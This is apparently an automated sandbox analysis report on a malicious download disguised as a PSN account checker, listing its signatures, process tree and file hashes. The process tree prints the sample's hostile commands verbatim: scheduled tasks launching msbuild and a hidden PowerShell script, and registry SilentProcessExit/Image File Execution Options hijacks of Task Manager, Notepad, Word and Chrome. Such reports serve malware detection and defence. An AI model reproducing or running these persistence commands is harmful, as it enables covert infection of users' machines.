Analysis
-
max time kernel
108s -
max time network
110s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
07-12-2021 09:05
General
-
Target
https://www.upload.ee/files/13695794/UltimatePSN_Checker_v1.2_Fixed.rar.html
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
-
Sets file execution options in registry 2 TTPs
-
Obfuscated with Agile.Net obfuscator 3 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Drops file in Program Files directory 17 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of FindShellTrayWindow 40 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.upload.ee/files/13695794/UltimatePSN_Checker_v1.2_Fixed.rar.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffbed324f50,0x7ffbed324f60,0x7ffbed324f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1868 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1536 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2724 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2316 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5800 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6288 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6204 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4560 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5452 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4452 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:82⤵
- Drops file in Program Files directory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1524,1803714135220116153,16892483666285223384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6628 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\" -spe -an -ai#7zMap4014:122:7zEvent213591⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\UltimatePSN Checker v1.2.exe"C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\UltimatePSN Checker v1.2.exe"1⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cd Data & ren deploy.dll deploy.bat & cmd /c start /min deploy.bat2⤵
-
C:\Windows\system32\cmd.execmd /c start /min deploy.bat3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K deploy.bat4⤵
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Link /s /d5⤵
- Views/modifies file attributes
-
C:\Windows\system32\xcopy.exexcopy resource C:\Users\Admin\Link /y /e5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "updater" /tr "cmd /c start /min C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Admin\link\config.png" /sc minute /mo 20 /F5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "chrome" /tr "cmd /c start /min powershell.exe -ExecutionPolicy Bypass -nop -w 1 C:\Users\Admin\link\input.ps1" /sc minute /mo 25 /F5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden cmd /c ren input.dll input.ps15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ren input.dll input.ps16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden cmd /c ren setup.dll setup.bat5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ren setup.dll setup.bat6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden cmd /c ren st.dll st.vbs5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ren st.dll st.vbs6⤵
-
C:\Windows\system32\cmd.execmd /c ren "playstation.cer" "UltimatePSN Checker v1.1.exe"5⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.execmd /c start /max launcher.bat5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K launcher.bat6⤵
-
C:\Users\Admin\Link\UltimatePSN Checker v1.1.exe"UltimatePSN Checker v1.1.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wscript.exewscript.exe st.vbs5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Link\setup.bat" "6⤵
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v GlobalFlag /t REG_DWORD /d 512 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Taskmgr.exe" /v ReportingMode /t REG_DWORD /d 1 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Taskmgr.exe" /v MonitorProcess /d "cmd /c start /min C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Admin\link\config.png" /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "cmd /c start /min powershell.exe -ExecutionPolicy Bypass -nop -w 1 C:\Users\Admin\link\input.ps1" /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINWORD.exe" /v GlobalFlag /t REG_DWORD /d 512 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\WINWORD.exe" /v ReportingMode /t REG_DWORD /d 1 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\WINWORD.exe" /v MonitorProcess /d "cmd /c start /min C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Admin\link\config.png" /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v GlobalFlag /t REG_DWORD /d 512 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\chrome.exe" /v ReportingMode /t REG_DWORD /d 1 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\chrome.exe" /v MonitorProcess /d "cmd /c start /min C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Admin\link\config.png" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM cmd.exe /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
1cfe572f8a58e5c315192b2262b19389
SHA10ee01be5ceb2f4c1769d1461a33900abb85879ea
SHA256a166e551d09fc5f77e4ede547e3dc521b71f4b5c07b93f16de2b0f976fed6751
SHA5127820fe3c45dd79a37c31d4a5a03a167b254f0e2eb5b9acf374944ffbebc3e2c919d494cdfcbf7d4d9e8142dac21d1c0e1c7e56fbfe337e8336e5302d88bcaa2f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
0272a6af8c3a1f8ed11c78ea0f3c825d
SHA1d991e99fda0aa1b7d4df2430e50c55520124f13d
SHA25676f216f23a23ea62e990b85a4a029be5c3dbbdf2d8c33c77bf5fb8eb25d3cb1a
SHA5129503daee2eef2a88c049d134b6f463ca4b391ba2488dfc3207628eb233d70e30fdec897e4ab87cddc3cc8d3359ddbe70c36fe1c98f8fa3db37f254e041b1feff
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2de05a352c5209ae49772c4a7f4069ea
SHA1dba2868fd1c04feae2406060bc5735a3b44162e2
SHA2563e83aa74ab072ff9ce075542ad111f2a8eb25076fd15c26f0aef27a72cd1de73
SHA512c2d3755fb2151f882e943c339b6f2274364de14c4822f870544e3a8b229b4c603e762375b0421b9dc662d666659fe77c858640ac65dabea8391e4317d1d81232
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed.rarMD5
ac6ed50d798ced9f09ffaf764225f37a
SHA1957c9d855ef48e01fd4d472700ae91ccc279ab12
SHA256008ec05d5808b766fc406329192c9a1aa3ec5a2085263b02da3377a6f0f4de2c
SHA5124d1b8ea470bb42455e6796e74311f4e5e4a25e060320f9b9048749f25240dbe47ec33c83426d391f65425d40a6a99a02ad4ab2ee5aee1ffbf5c13a6d9d53b751
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\deploy.dllMD5
ddc4128d3920e93781d4dcf2222cf32f
SHA1a70ff1496c56385c0feda451d0bf16474b0de114
SHA2563d0ebd26f7908bb8e4b02453927d449eaa7de3471ed40a2fa43b59573ee3fb96
SHA5128477826514b00a4633a6f094a59f4b695870e36236bcb135ba05d7457f529580488128a86341186bdf5dea1a9436dda3bd62526d4fcf9c90d7f7ba2c8b807dee
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\resource\License.keyMD5
b3d5b1f874c2678836852e6e9e2fa1e9
SHA1e75d359e9cd8d6bf0fcfe075ce10b88fd3f512e6
SHA256898adce9cba3a765bfabb050eb41122ec843ba3db8e57c7056b0345d35331276
SHA5128355468a06286bac7ec7141d9612370c47ecc1ef612277f1943351b85d934c8abc1966ed2d114102a338e0ba2a21850e309e5aa349ce0c0c67f49d81d1072296
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\resource\config.pngMD5
911d5a927c6b814fb97f877c159552d1
SHA1796ccfef447c1e6f2f4e49832d290938bad4aa6d
SHA2565a899dcb3c4114ba3225dd3989bd4561c10f8d6d84c3dc202c9aaeb6e0c42ccb
SHA51286880c4e9aa0249855a69fa411198b1ca8605f6f75b90e19b03a9cf5b70dbf0c627e6eefa0418a1e1ea1ea620bab0374f33a74df4bab22e3705019810e4806c0
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\resource\icon.pngMD5
73a72358e646f72990cbe96c886a4152
SHA1bf63163365af0e34bd4b6a97470bf54f68200b1e
SHA2567fe930ecfae5983b1dc2faceaa6479222a20b3f7d3dbcee224e146f66a57b775
SHA5124743385c1391b51807c6b025e4f04fbae96c00d787a5baeb1fbfc5d8bb95b95ca2ab77667b0949138492d86178a37f0d0f5070095c577f86cfba74fe04c851af
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\resource\input.dllMD5
7106acbc0573fd06b00a0cf3134cf53b
SHA15b1cd553ce34193a48f13851f6dc624cebe9630e
SHA256dbe765a0f1706aef4bb110bb23ead2c39f95d25e235606d149a291ccfc937733
SHA512c7e5255cb93ce77ce29302db9104171fb06fd0a1560ff7f093003bd8b97886810541424270bc964bc3004b66b32d6ea3996789756e2dc4067a179016518ade1e
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\resource\launcher.batMD5
3c46b0c109ce0cc49ef3169ad7626765
SHA174280a65a35f7d6c4ed75737d0dce6408d785289
SHA256fc661643deed5d72a7e4db692e07a2593264183f11c3bb97a8312200d42a4d92
SHA512ca1f26f3b70f086bb3f14bef665e97a76b5d4657487ed662a5b6dacb98d13a7b37127eab5f1f2d13b194dca1cdcbe58ff587392a455feb0c0f3bbabd89603674
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\resource\playstation.cerMD5
199291e246aacb45dbad7bfe296066fa
SHA11b8727331c02190d860e26f4a74156e5d1196012
SHA256b78cfa136bc15eb5cd403a4751202b56035d360438481147d87df90f7e33f65c
SHA51275f37558ae706e07b73b1e4c9af73068697141107a6adcd84c55500c20cce3fb6ca2be74ce58c5ce4886c58fd9d79b8fab7a18756ee7bdece250a43dfc42939f
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\resource\settings.jsonMD5
29553ed8ec7041f0096ba99c9ecb9d02
SHA1abdb7af88d1662e8e8cf00420ebfd68acf033b3b
SHA256f7401198f07713e63dc0ed78f3f43dabb46b17a0b441843882785d4006f685ee
SHA512464adc591f39bcd7e61be972e55844bb0ca805e0fba7e018eb88e15ead53f9daac068903a19adf4da65ed6150fb8b3db44427d441b0eac9084eb7a9b2e5a62ef
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\resource\setup.dllMD5
ee29e3601f2660c71bfcaf8e82fc1747
SHA1da43a95d8cc5679a8b9cb0caf00b091edc64382b
SHA256663eb38cc80e8ac2797d7db950bd13ff718ad61b405c35f8cb314b239042fdbc
SHA51229d60838129ebf68a512639585ccbe90287cf8b360bcdfb1b7d17823a78ec05517a23f979a8e4bb615a61d1e8fa94f1f37750e7ce92f6839687769402b4c4675
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\Data\resource\st.dllMD5
77cce38ec5e1fb1dfd444e185be33e55
SHA1888757f1a9049ecb692283aaece2978374435904
SHA25635153cd01cd731c2942915cdeb65cdfcfe6327ea2e3effafa60140686b9c9b94
SHA51259ecd6cacc7cab448e80c10bb2a0e2cbbdae8cc8535ab6cd9afc3d9731be556ede54ad2ab31cdf6724f238bbbfce9fb43b4567dc153ebca66f9d3fa371b1e46d
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\UltimatePSN Checker v1.2.exeMD5
b0fb8ad7fc7cd4252d2f2b7b407db150
SHA12fd149a1740ef0bcc56d3078c764fb4ca5e35557
SHA256d0898886328214c4a444a6f96323738075ddf6f3382f1bc329046f99ee1192a8
SHA512154a78d81b88cd4c773512df986015979b5a16441143c3035990fbf0816340616c91841b8846612465050f8ac770dbddc8ae598d5eb3ef10886881f47d8fb809
-
C:\Users\Admin\Downloads\UltimatePSN_Checker_v1.2_Fixed\UltimatePSN Checker v1.2.exeMD5
b0fb8ad7fc7cd4252d2f2b7b407db150
SHA12fd149a1740ef0bcc56d3078c764fb4ca5e35557
SHA256d0898886328214c4a444a6f96323738075ddf6f3382f1bc329046f99ee1192a8
SHA512154a78d81b88cd4c773512df986015979b5a16441143c3035990fbf0816340616c91841b8846612465050f8ac770dbddc8ae598d5eb3ef10886881f47d8fb809
-
C:\Users\Admin\Link\License.keyMD5
b3d5b1f874c2678836852e6e9e2fa1e9
SHA1e75d359e9cd8d6bf0fcfe075ce10b88fd3f512e6
SHA256898adce9cba3a765bfabb050eb41122ec843ba3db8e57c7056b0345d35331276
SHA5128355468a06286bac7ec7141d9612370c47ecc1ef612277f1943351b85d934c8abc1966ed2d114102a338e0ba2a21850e309e5aa349ce0c0c67f49d81d1072296
-
C:\Users\Admin\Link\UltimatePSN Checker v1.1.exeMD5
199291e246aacb45dbad7bfe296066fa
SHA11b8727331c02190d860e26f4a74156e5d1196012
SHA256b78cfa136bc15eb5cd403a4751202b56035d360438481147d87df90f7e33f65c
SHA51275f37558ae706e07b73b1e4c9af73068697141107a6adcd84c55500c20cce3fb6ca2be74ce58c5ce4886c58fd9d79b8fab7a18756ee7bdece250a43dfc42939f
-
C:\Users\Admin\Link\input.dllMD5
7106acbc0573fd06b00a0cf3134cf53b
SHA15b1cd553ce34193a48f13851f6dc624cebe9630e
SHA256dbe765a0f1706aef4bb110bb23ead2c39f95d25e235606d149a291ccfc937733
SHA512c7e5255cb93ce77ce29302db9104171fb06fd0a1560ff7f093003bd8b97886810541424270bc964bc3004b66b32d6ea3996789756e2dc4067a179016518ade1e
-
C:\Users\Admin\Link\launcher.batMD5
3c46b0c109ce0cc49ef3169ad7626765
SHA174280a65a35f7d6c4ed75737d0dce6408d785289
SHA256fc661643deed5d72a7e4db692e07a2593264183f11c3bb97a8312200d42a4d92
SHA512ca1f26f3b70f086bb3f14bef665e97a76b5d4657487ed662a5b6dacb98d13a7b37127eab5f1f2d13b194dca1cdcbe58ff587392a455feb0c0f3bbabd89603674
-
C:\Users\Admin\Link\playstation.cerMD5
199291e246aacb45dbad7bfe296066fa
SHA11b8727331c02190d860e26f4a74156e5d1196012
SHA256b78cfa136bc15eb5cd403a4751202b56035d360438481147d87df90f7e33f65c
SHA51275f37558ae706e07b73b1e4c9af73068697141107a6adcd84c55500c20cce3fb6ca2be74ce58c5ce4886c58fd9d79b8fab7a18756ee7bdece250a43dfc42939f
-
C:\Users\Admin\Link\settings.jsonMD5
29553ed8ec7041f0096ba99c9ecb9d02
SHA1abdb7af88d1662e8e8cf00420ebfd68acf033b3b
SHA256f7401198f07713e63dc0ed78f3f43dabb46b17a0b441843882785d4006f685ee
SHA512464adc591f39bcd7e61be972e55844bb0ca805e0fba7e018eb88e15ead53f9daac068903a19adf4da65ed6150fb8b3db44427d441b0eac9084eb7a9b2e5a62ef
-
C:\Users\Admin\Link\setup.dllMD5
ee29e3601f2660c71bfcaf8e82fc1747
SHA1da43a95d8cc5679a8b9cb0caf00b091edc64382b
SHA256663eb38cc80e8ac2797d7db950bd13ff718ad61b405c35f8cb314b239042fdbc
SHA51229d60838129ebf68a512639585ccbe90287cf8b360bcdfb1b7d17823a78ec05517a23f979a8e4bb615a61d1e8fa94f1f37750e7ce92f6839687769402b4c4675
-
C:\Users\Admin\Link\st.dllMD5
77cce38ec5e1fb1dfd444e185be33e55
SHA1888757f1a9049ecb692283aaece2978374435904
SHA25635153cd01cd731c2942915cdeb65cdfcfe6327ea2e3effafa60140686b9c9b94
